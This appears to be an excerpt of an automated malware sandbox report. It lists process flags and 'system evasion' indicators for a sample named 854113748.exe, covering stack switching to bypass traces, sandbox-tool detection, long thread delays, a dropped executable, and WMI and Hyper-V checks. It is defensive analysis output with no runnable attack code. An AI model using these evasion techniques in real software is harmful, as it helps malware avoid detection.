                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\854113748.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX

                      Malware Analysis System Evasion

                      barindex
                      Switches to a custom stack to bypass stack traces
                      Source: C:\Users\user\AppData\Local\Temp\854113748.exeAPI/Special instruction interceptor: Address: 7FFE2220D044
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeAPI/Special instruction interceptor: Address: 7FFE2220D044
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeAPI/Special instruction interceptor: Address: 58EB83A
                      Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
                      Source: 854113748.exe, 0000001A.00000002.2370480900.00000000004D6000.00000040.00000001.01000000.00000014.sdmp, 854113748.exe, 0000001A.00000002.2371250496.0000000002269000.00000040.00001000.00020000.00000000.sdmp, 854113748.exe, 0000001D.00000003.2337948831.0000000000619000.00000040.00000400.00020000.00000000.sdmp, 854113748.exe, 0000001D.00000003.2342650370.0000000000619000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: ORIGINALFILENAMECFF EXPLORER.EXE:
                      Source: 854113748.exeBinary or memory string: CFF EXPLORER.EXE
                      Source: 854113748.exe, 0000001A.00000002.2370480900.00000000004D6000.00000040.00000001.01000000.00000014.sdmp, 854113748.exe, 0000001A.00000002.2371250496.0000000002269000.00000040.00001000.00020000.00000000.sdmp, 854113748.exe, 0000001D.00000003.2337948831.0000000000619000.00000040.00000400.00020000.00000000.sdmp, 854113748.exe, 0000001D.00000003.2342650370.0000000000619000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: INTERNALNAMECFF EXPLORER.EXE
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 593203
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 593045
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 592880
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 592755
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 592629
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 592467
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 592331
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 592194
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 592006
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 591891
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 591766
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 591656
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 591547
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 591435
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 591319
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 591069
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 590700
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 590594
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 590485
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 590360
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4193Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5678Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 8264
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1297
                      Source: C:\Users\user\AppData\Local\Temp\854113748.exeDropped PE file which has not been started: C:\Users\user\Documents\Perfectouin\Bin\PerfectouinVans.exeJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\854113748.exeEvasive API call chain: GetModuleFileName,DecisionNodes,ExitProcessgraph_26-32899
                      Source: C:\Users\user\AppData\Local\Temp\854113748.exeAPI coverage: 0.4 %
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6828Thread sleep count: 4193 > 30Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 180Thread sleep count: 5678 > 30Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7176Thread sleep time: -15679732462653109s >= -30000sJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7200Thread sleep time: -1844674407370954s >= -30000sJump to behavior
                      Source: C:\Windows\System32\svchost.exe TID: 7540Thread sleep time: -30000s >= -30000sJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8692Thread sleep count: 8264 > 30
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8792Thread sleep count: 33 > 30
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8792Thread sleep time: -30437127721620741s >= -30000s
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8836Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8692Thread sleep count: 1297 > 30
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8792Thread sleep time: -593203s >= -30000s
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8792Thread sleep time: -593045s >= -30000s
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8792Thread sleep time: -592880s >= -30000s
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8792Thread sleep time: -592755s >= -30000s
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8792Thread sleep time: -592629s >= -30000s
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8792Thread sleep time: -592467s >= -30000s
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8792Thread sleep time: -592331s >= -30000s
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8792Thread sleep time: -592194s >= -30000s
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8792Thread sleep time: -592006s >= -30000s
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8792Thread sleep time: -591891s >= -30000s
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8792Thread sleep time: -591766s >= -30000s
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8792Thread sleep time: -591656s >= -30000s
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8792Thread sleep time: -591547s >= -30000s
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8792Thread sleep time: -591435s >= -30000s
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8792Thread sleep time: -591319s >= -30000s
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8792Thread sleep time: -591069s >= -30000s
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8792Thread sleep time: -590700s >= -30000s
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8792Thread sleep time: -590594s >= -30000s
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8792Thread sleep time: -590485s >= -30000s
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8792Thread sleep time: -590360s >= -30000s
                      Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0Jump to behavior
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: C:\Users\user\AppData\Local\Temp\854113748.exeCode function: 26_2_00411150 FindFirstFileW,GetPrivateProfileStringW,GetPrivateProfileStringW,GetPrivateProfileStringW,StrFormatByteSizeW,GetPrivateProfileStringW,FindNextFileW,FindClose,26_2_00411150
                      Source: C:\Users\user\AppData\Local\Temp\854113748.exeCode function: 26_2_004631F0 FindFirstFileW,FindNextFileW,FindClose,26_2_004631F0
                      Source: C:\Users\user\AppData\Local\Temp\854113748.exeCode function: 26_2_0045A7D0 GetDiskFreeSpaceExW,GetDiskFreeSpaceW,FindFirstFileW,FindClose,GetDiskFreeSpaceW,26_2_0045A7D0
                      Source: C:\Users\user\AppData\Local\Temp\854113748.exeCode function: 26_2_00462F00 FindFirstFileW,FindClose,26_2_00462F00
                      Source: C:\Users\user\AppData\Local\Temp\854113748.exeCode function: 29_2_00411150 FindFirstFileW,GetPrivateProfileStringW,GetPrivateProfileStringW,GetPrivateProfileStringW,StrFormatByteSizeW,GetPrivateProfileStringW,FindNextFileW,FindClose,29_2_00411150
                      Source: C:\Users\user\AppData\Local\Temp\854113748.exeCode function: 29_2_004631F0 FindFirstFileW,FindNextFileW,FindClose,29_2_004631F0
                      Source: C:\Users\user\AppData\Local\Temp\854113748.exeCode function: 29_2_0045A7D0 GetDiskFreeSpaceExW,GetDiskFreeSpaceW,FindFirstFileW,FindClose,GetDiskFreeSpaceW,29_2_0045A7D0
                      Source: C:\Users\user\AppData\Local\Temp\854113748.exeCode function: 29_2_00462F00 FindFirstFileW,FindClose,29_2_00462F00
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 593203
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 593045
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 592880
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 592755
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 592629
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 592467
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 592331
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 592194
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 592006
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 591891
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 591766
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 591656
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 591547
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 591435
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 591319
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 591069
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 590700
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 590594
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 590485
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 590360
                      Source: powershell.exe, 00000002.00000002.2023468036.0000012D1BABD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tEventVmNetworkAdapter',
                      Source: powershell.exe, 00000002.00000002.2023468036.0000012D1BABD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 'Remove-NetEventVmNetworkAdapter',
                      Source: fontdrvhost.exe, 0000001E.00000002.2470274318.000000000325A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWXl(
                      Source: powershell.exe, 00000010.00000002.2196048656.0000023355B0E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Remove-NetEventVmNetworkAdapter
                      Source: powershell.exe, 00000002.00000002.2023468036.0000012D1BABD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 'MSFT_NetEventVmNetworkAdatper.cdxml',
                      Source: powershell.exe, 00000002.00000002.2023468036.0000012D1BABD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Get-NetEventVmNetworkAdapterX
                      Source: powershell.exe, 00000010.00000002.2277453926.000002336DB10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll;
                      Source: powershell.exe, 00000010.00000002.2196048656.0000023355B0E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Add-NetEventVmNetworkAdapter
                      Source: powershell.exe, 00000002.00000002.2023468036.0000012D1BABD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Remove-NetEventVmNetworkAdapterX
                      Source: powershell.exe, 00000002.00000002.2094822696.0000012D32570000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllR
                      Source: powershell.exe, 00000002.00000002.2023468036.0000012D1BABD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: +MSFT_NetEventVmNetworkAdatper.format.ps1xmlX
                      Source: fontdrvhost.exe, 0000001E.00000003.2350549832.00000000058B0000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: DisableGuestVmNetworkConnectivity
                      Source: powershell.exe, 00000002.00000002.2023468036.0000012D1BABD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Add-NetEventVmNetworkAdapterX
                      Source: svchost.exe, 00000006.00000002.3020933754.000001BA2042B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.3022658578.000001BA2585A000.00000004.00000020.00020000.00000000.sdmp, fontdrvhost.exe, 0000001E.00000002.2470274318.0000000003293000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                      Source: powershell.exe, 00000002.00000002.2023468036.0000012D1BABD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: #MSFT_NetEventVmNetworkAdatper.cdxmlX
